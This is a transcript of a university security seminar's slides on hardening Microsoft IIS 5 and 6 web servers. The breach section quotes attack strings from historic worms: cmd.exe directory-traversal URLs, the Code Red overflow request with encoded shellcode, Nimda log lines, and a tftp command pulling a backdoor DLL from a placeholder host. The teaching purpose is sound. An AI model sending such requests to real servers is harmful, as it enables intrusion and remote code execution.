Download
slide1 n.
Skip this Video
Loading SlideShow in 5 Seconds..
IIS Security PowerPoint Presentation
Download Presentation
IIS Security

IIS Security

301 Views Download Presentation
Download Presentation

IIS Security

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

    Slide 1:IIS Security Laurie Walters Lxm30@psu.edu Security Operations and Services A Unit of Information Technology Services

    Slide 2:Note: Powerpoint slides to this and other seminars, links to utilities, patches, and suggestions for securing Windows operating systems and applications can be found at: http://www.personal.psu.edu/lxm30/windows/windows.html

    Slide 3:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 4:Secure Your System Before Installing IIS Install IIS on Standalone server NOT on a Domain Controller or other application server Format drives using NTFS instead of FAT Make sure ALL accounts have good passwords (includes OS accounts and application accounts) Install all OS patches Install application patches Apply appropriate security policies for local machine (see XP II seminar notes for some suggested guidelines) include Auditing.

    Slide 5:Creating Data for IIS Do not place data in default IIS directory (C:\Inetpub\WWWRoot) If possible, store data on a different partition than your o.s. Check permissions for data to make sure that Everyone doesnt have Full Control (the default is for Everyone to have full control).

    Slide 6:Demonstration of Appropriate Permissions for Web Data Navigate to data folder and right click on it Ensure that Administrator and System have full control and that the Everyone group doesnt. If the Everyone group has full control, remove that group. Add Authenticated users; grant the appropriate permissions Demonstration of appropriate permissions

    Slide 7:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 8:Installing IIS 5 IIS Patch must be applied before machine is networked! http://support.microsoft.com/default.aspx?scid=kb%3ben-us%3b811114 It is better to install IIS after operating system is secured than while initially setting up OS. Add / Remove Programs ? Add / Remove Windows Components

    Slide 9:IIS 5 Installation By default, the following are installed: Common Files Documentation Front Page 2000 Server Extensions IIS Snap-In SMTP service WWW Service WWWAdmin Service Do not install Documentation on a production web server. If you are not using Form Mail, do not install SMTP service.

    Slide 10:IIS 5 Installation The following are not installed by default: FTP Service Scripts virtual directory Do not install these unless absolutely necessary

    Slide 11:IIS 5 Installation Adds Internet Information Services snap in (ISM) and server extension administrator snap in to Administrative Tools. Adds accounts: IUSR_MACHINENAME built in account for anonymous IIS access IWAM_MACHINENAME built in account for out of process access

    Slide 12:Uninstallation of IIS 5 Following arent uninstalled: \Inetpub \Systemroot\Help\iishelp \Systemroot\system32\inetsrv Following users are not removed: IUSR_Machinename IWAM_Machinename

    Slide 13:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 14:Managing IIS 5 After IIS is installed, you can access it one of two ways: Internet Service Manager (ISM) HTML ISM

    Slide 15:Internet Service Manager Can be accessed through: Start ? Settings ? Control Panel ? Administrative Tools ? Internet Service Manager You can create an ISM shortcut on your desktop by right clicking on the ISM icon and clicking on Create Shortcut, then drag that shortcut to the desktop.

    Slide 16:HTML ISM Web-page version of your ISM that can be accessed to remotely manage your IIS application (not necessarily recommended!) Accessed though the following URL: http://localhost:XXX/IISAdmin/iis.asp *Where XXX is the port number of your Administration Web Site. Anonymous access to this site is not enabled by default (if accessing remotely, you will need a windows administrator username and password)

    Slide 17:Finding the Port Number of Administration Web Site Open up normal ISM through the Control Panel. Right click on Administration Web Site Choose Properties The Web Site tab will appear by default. On this tab, at the top, under Web Site Administation will be TCP Port: followed by a number in the box. This is your XXX port. You can change this random port to anything youd like.

    Slide 18:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 19:Backing Up IIS Metabase The IIS Metabase is similar to the Windows registry. It stores configuration entries for IIS. It is a memory-resident database at: C:\Winnt\System32\Inetsrv\Metabase.bin The Metabase can become corrupted so it should be backed up every time a change is made to IIS. You cannot easily restore IIS Metabase info. to another computer http://support.microsoft.com/?kbid=301386

    Slide 20:Backing Up IIS Metabase To backup the Metabase, in the ISM, right click on your server icon and select Backup/Restore Configuration. Click on Create Backup and enter a meaningful name.

    Slide 21:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 22:Ways to Overcome Common IIS Breaches Other Than Patching Patching prevents current vulnerabilities

    Slide 23:Other means than patching help secure against future vulnerabilities Always install IIS on NTFS formatted drives Install IIS on separate hard drive or Do not allow everyone or the IUSR account to run *.exe (e.g. cmd.exe) commands Use URLScan and IIS Lockdown Tools Follow suggested SOS guidelines for securing OS and IIS

    Slide 24:IIS Lockdown Tool http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/Tools/locktool.asp Turns off unnecessary services and features of IIS.

    Slide 25:URLScan Part of IIS Lockdown tool. It also turns off unneeded features and restricts type of HTTP requests that the server can process. Execute the following command: Iislockd.exe /q /c t:<c:\lockdown_files It will install urlscan.exe to this folder. Run Urlscan.exe to install it.

    Slide 26:What can be filtered with URLScan: Request method (verb) e.g. GET, Head, Post, etc. File extension of the resource requested Suspicious URL encoding Presence of non-ASCII characters in the URL Presence of specified character sequences in the URL Presence of specified headers in the request

    Slide 27:Additional abilities of URLScan 2.5: Ability to change the log file directory Ability to log long URLs Ability to restrict the size of requests

    Slide 28:Securing IIS 5 Manually Change permissions on vital files Cacls %systemroot%\*.exe /T /G System:F Administrators:F Also change permission for the file command.com Do not use Default Web Site create a New Web Site Stop or Delete Administrative Web Site Remove IIS Samples and Documentation Group all static content separate from scripts, executables, etc. Remove Unnecessary script mappings

    Slide 29:Make sure you have the correct version of MDAC MDAC provides the underlying functionality for database operations, like connecting to remote databases and returning data to a client. Heap overflow vulnerability in versions 2.6 and lower. If you do not need MDAC, remove this virtual directory from your system.

    Slide 30:Removing Unnecessary Script Mappings .ida, .idq, .htw: Index Services .htr: web-based Windows Password reset .printer: Internet Printing Protocol .stm, .shtm, .shtml: Server-side includes .idc: database applications

    Slide 31:Disabling Parent Paths Parent Paths allow you to use relative file path names (../directory/file.html instead of c:/directory/file.html). The vulnerability in Parent Paths is that they can be exploited to move in reverse through file structure to get to root of C:/, Then one can traverse to known file locations that are: more permissive (e.g. C:\wwwroot\inetpub\scripts) or contain goodies (e.g. C:\winnt\system32)

    Slide 32:You can disable parent paths and still use relative pathnames Note: It is possible to use relative pathnames with some effort. (e.g. if your IIS data folder is in a different folder than your database and you dont want to use absolute pathnames for everything). You have to use some coding to make a variable for the absolute pathname and use it to implement relative pathnames. http://www.windowswebsolutions.com/Articles/Index.cfm?ArticleID=23278

    Slide 34:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 35:IIS 6 Installation By default, the following are installed: Common Files Documentation IIS Snap-In WWW Service Front Page (Office) Server Extensions and Asp .NET installed if you check these options Do not install Documentation on a production web server. If you are not using Form Mail, do not install SMTP service.

    Slide 36:IIS 6 Installation The following are not installed by default: FTP Service Scripts virtual directory Do not install these unless absolutely necessary

    Slide 37:IIS 6 Installation Installed by Manage Your Server in Start ? Administrative Tools Choose Add or Remove a Role Choose Application Server Follow the prompts, and choose whether to install the ASP .NET and Frontpage Server Extensions

    Slide 38:IIS 6 Installation Adds Internet Information Services snap in (ISM) and server extension administrator snap in to Administrative Tools. Adds accounts: IUSR_MACHINENAME built in account for anonymous IIS access IWAM_MACHINENAME built in account for out of process access

    Slide 39:Uninstallation of IIS 6 Following arent uninstalled: \Inetpub \Systemroot\Help\iishelp \Systemroot\system32\inetsrv Following users are not removed: IUSR_Machinename IWAM_Machinename

    Slide 40:Installing IIS 6 With IIS 6, you have to actually turn on the features youd like to use Under ISM, click on Web Service Extensions Features currently installed in IIS will be listed on the right hand side All Unknown ISAPI Extensions All Unknown CGI Extensions Active Server Pages FrontPage Server Extensions 2002 (only if you installed) Internet Data Connector Server Side Includes WebDAV All are prohibited until you click allow. You can add new web service extensions as needed

    Slide 41:Demonstrations IIS Lockdown Tool for IIS 5 Manually securing IIS 5 Manually securing IIS 6

    Slide 42:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 43:IIS Authentication To set means of IIS Authentication, right click on your web site and select properties, then choose the directory security tab. Click on the Edit button next to Anonymous access and Authentication control. Anonymous - uses IUSR_Machinename to anonymously access the site Integrated Windows users connect to the machine with a Windows username and password Basic authenticates to machine using unencrypted username / password (user accounts must have log on locally rights). Digest authentication within a W2K domain, password hashes compared against DC hashes. Kerberos authenticate to a K4 or K5 domain

    Slide 44:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 45:FTP and SMTP Disable SMTP and FTP if not needed; if absolutely needed, limit access by userid/pw or IP address Use other means than FTP if possible (WebDav, Terminal Services, etc). Allowing totally anonymous connections to machine bad idea. Specify directory where users can upload/download files. Create appropriate permissions on files in this directory (e.g. remote users can read but not write or execute files).

    Slide 46:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 47:IIS Logging Enable extended logging properties in IIS Manager W3C Extended Log Format instead of Active Log Make sure Date, Time, Server IP, Client IP, URI Stem and URI Query are checked Daily logs kept in UTC (GMT) format in the following location: C:\Windows\System32\Logfiles\W3SVC1\ex020930.txt Check the box Use local time for file naming and rollover so that logs are kept in EST/EDT instead of GMT.

    Slide 48:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 49:Common IIS Breaches Buffer Overflows (XXXXXXXXXXXXXXXcode) Directory Traversal (../../../c:winnt/system32/cmd.exe) Canonicalization Request unusual action using cmd.exe, *.bat Encoded using an alternate character set (e.g. Unicode) or include character sequences that are rarely seen in legitimate requests. All of above used for recent worms (e.g. IIS/Sadmind, Code Red, Code Red 2, Nimda)

    Slide 50:Buffer Overflows Programs dont check input for appropriate length. Extra input above and beyond maximum length gets attached to CPU execution stack. Attackers must carefully program B.O. code to identify the location of where it is added the stack, so that they can return to this location and execute the arbitrary input.

    Slide 51:Problem with Buffer Overflows in IIS IIS process runs in the context of the SYSTEM account. When a Buffer Overflow is leveraged against IIS, arbitrary commands can be run under context of SYSTEM user.

    Slide 52:Canonicalization Various file names are equivalent E.g. c:\directory\file.html, file.html, and ..\..\file.html may all refer to the same file When some non-static file types are requested via a malformed URL, the canonicalization locates the correct file, but mixes up the actual location of the file. Since it determines the file is in a different folder than it actually is, it applies incorrect permissions.

    Slide 53:Problem with Canonicalization A file in a folder with restricted permissions would be requested, however, the permissions granted would be of the files ancestors rather than actual file permissions If parent permissions are less restrictive, the attacker could get extra privileges for the file.

    Slide 54:Directory Traversal (Dot Dot Slash) Results from inadequate NTFS ACLs on the directory or files in question. http://www.iistestbox.com/../../../../../winnt/system32/cmd.exe

    Slide 55:Examples of Unicode and Hex Encoding URLS Unicode Example: Arabic letters Hexadecimal Examples: Space: %20 Plus: %2B Period: %2E /: %2F Colon: %3A ?: %3F \: %5C %: %25

    Slide 56:Hexadecimal use Good use of hexadecimal: http://www.iistestbox.com/files/the%20name%20o f%20the%20file.txt Bad use of hexadecimal: http://www.iistestbox.com/..%2F..%2Fwinnt/file.txt Double decoding of hex IIS performs two decodes of HTTP requests that traverse executable directories %255c 1st decode = %5c 2nd decode = \

    Slide 57:IIS Sadmind Worm GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -

    Slide 58:Affects of IIS / Sadmind sadmind/IIS worm exploited a vulnerability in Solaris systems The Solaris worm created a root shell on the infected host and automatically attacked other vulnerable Solaris systems. It subsequently installed software to attack and deface Microsoft IIS web servers

    Slide 59:Ways to Protect Against IIS Sadmind Microsoft Patch MS00-078 to prevent Canonicalization Disable Parent paths Restrict Access to cmd.exe so that it cant be used by the worm

    Slide 60:.printer Buffer Overflow (jill.c) .printer: Web based control of networked printers GET /NULL.printer HTTP/1.0 Host: [420character buffer] Instead of crashing, IIS automatically restarts itself due to Redundancy Jill exploits .printer B.O. vulnerability to create a remote shell, where attacker can enter any command at the following prompt: C:\WINNT\System32>

    Slide 61:Ways to protect against Jill B.O.: Microsoft Patch MS01-023 If not using IPP, Unmap the .printer DLL file extension in IIS so that it is not loaded on IIS startup. Or, you could delete the file C:\Winnt\System32\msw3prt.dll which is the actual file that the .printer extension points to.

    Slide 62:.ida/.idq Buffer Overflow .ida provides support for administrative scripts, .idq provides support for internet data queries (Indexing Services) .ida/idq B.O works by using .ida to send a too-long variable to the idq.dll GET /null.ida? [240 character buffer]=X HTTP/1.1 IIS process is halted before this even reaches Index service, restarts IIS

    Slide 63:Code Red 1 Worm (Another .ida/.idq worm) /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a

    Slide 64:Affects of Code Red 1 A machine infected with Code Red 1 scans random IP addresses on port 80/TCP looking for other hosts to infect. Code Red 1 is stored in memory (when machine reboots, worm no longer performs scans). Web pages on Code Red 1-infected machines may be defaced with the following message: HELLO! Welcome to http://www.worm.com! Hacked By Chinese!

    Slide 65:Ways to Protect Against Code Red 1 Microsoft Cumulative Patch MS 02-062 (original patch MS01-033) If not using Indexing Services, remove application mapping for .ida and .idq Install URLScan to deny functionality of any request with % hexadecimal

    Slide 66:Code Red 2 GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 0%u531b%u53ff%u0078%u0000%u00=a

    Slide 67:Affects of Code Red 2 After a successful .ida/.idq B.O., CR2 creates threads to scan for new infected hosts for the next 24 hours. Unlike Code Red I, CR2 is not only memory-resident. CR2 then copies cmd.exe to the file root.exe in the publicly accessible IIS scripts and MSADC folders (an intruder may then execute arbitrary commands with the privileges of the IIS server process).

    Slide 68:CR2 Contains a Backdoor Trojan A Trojan horse copy of explorer.exe is created with CR2 and copied to C:\ and D:\. The Trojan horse explorer.exe calls the real explorer.exe to mask its existence, and creates a virtual mapping which exposes the C: and D: drives. On systems not patched against the "Relative Shell Path" vulnerability,this Trojan horse copy of explorer.exe will run every time a user logs in.

    Slide 69:Ways to Protect Against CR2 Microsoft Cumulative Patch MS02-062 If not using Indexing Services, remove application mapping for .ida and .idq Install URLScan to deny functionality of any request with % hexadecimal Restrict Access to cmd.exe so that it cant be used by the worm Protect against the"Relative Shell Path" vulnerability Microsoft Patch MS02-052

    Slide 70:Nimda Worm Nimda worm sent with an attachment pretends to have a "audio/x-wav" content-type (Really an executable file). If executed, it infects the host, causing various files to be replaced with infected copies. The worm sends itself out by email, searches for open network shares, attempts to copy itself to un-patched or vulnerable Microsoft IIS web servers, and is a virus infecting both local files and files on remote network shares.

    Slide 71:Nimda GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability.

    Slide 72:Nimda on IIS Server Nimda attempts to install an Admin.dll file in the root directory of c:\, d:\, or e:\ (Note that the file name Admin.dll may be legitimately installed by IIS in other directories.) It then scans other systems on port 80, attempting to infect them with Nimda

    Slide 73:Nimda Backdoor Attackers send string: /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll to attempt to connect to infected systems. A return code of 200 indicates success of this command.)

    Slide 74:Ways to Protect Against Nimda (Email Portion) Microsoft Patch for automatic execution of previewed files in Outlook (MS01-020) Do not open attachments without verification Protect against open network shares

    Slide 75:Ways to Protect Against Nimda (IIS Portion) Microsoft Cumulative Patch MS02-062 (Protects against both means of Nimda IIS infection: Code Red 2 Backdoor and Directory Traversal) If not using Indexing Services, remove application mapping for .ida and .idq Install URLScan to deny functionality of any request with % hexadecimal Restrict Access to cmd.exe so that it cant be used by the worm Protect against the "Relative Shell Path" vulnerability of explorer.exe: Microsoft Patch MS02-052 Disable Parent Paths

    Slide 76:IIS Security Seminar Objectives IIS 5 Security Securing Server and Creating Web Data Installation of IIS 5 IIS 5 Management Backing Up IIS Configuration files Securing IIS manually and with IIS Lockdown tool IIS 6 Installation and Security Authentication FTP and SMTP Logging Common IIS Breaches and how to prevent them

    Slide 77:In Conclusion IIS is a big target for skilled hackers as well as script kiddies. Staying current on patches will help prevent your IIS box from being broken in to, however, proper locking down will also be highly effective against future vulnerabilities.

    Slide 78:Microsoft Security Guides Microsoft Guide to Securing IIS 5: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/iis/tips/iis5chk.asp Microsoft Guide to Securing Windows 2000: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/prodtech/windows/secwin2k/default.asp

    Slide 79:Slides and Recommended Guidelines: Todays Slides, recommended guidelines for IIS, Windows 2000 and XP, links to security tools and further reading: http://www.personal.psu.edu/lxm30/windows/windows.html

    Slide 80: